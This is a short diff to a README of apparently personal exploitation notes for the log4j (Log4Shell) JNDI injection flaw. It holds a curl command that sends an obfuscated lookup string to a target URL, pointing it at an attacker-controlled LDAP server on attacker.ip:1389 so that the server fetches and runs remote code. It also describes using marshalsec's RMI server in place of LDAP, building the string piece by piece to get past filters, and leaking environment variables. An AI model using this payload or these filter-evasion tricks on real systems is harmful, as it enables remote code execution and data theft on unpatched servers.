FalcoGer/pmp/log4j/README.md

 curl 'http://target.tld/vulnerable/uri/endpoit/loggin/query/parameters?bar=$\{$\{upper:j\}$\{::-n\}$\{upper:d\}$\{lower:i\}:ldap://attacker.ip:1389/Exploit\}'
 ```

-for example results in "j"
 we can use this method to build the whole string.
+We can even go in further and expand the `u` in `upper` for example.

 Also marshalsec can do RMI protocol.
 Simply start with `marshalsec.jndi.RMIRefServer`, and instead of `ldap://` use `rmi://` in the exploit string

-#Other stuff
+# Other stuff
 log4j can expand arbitrary environment variables
 even without RCE this can be bad.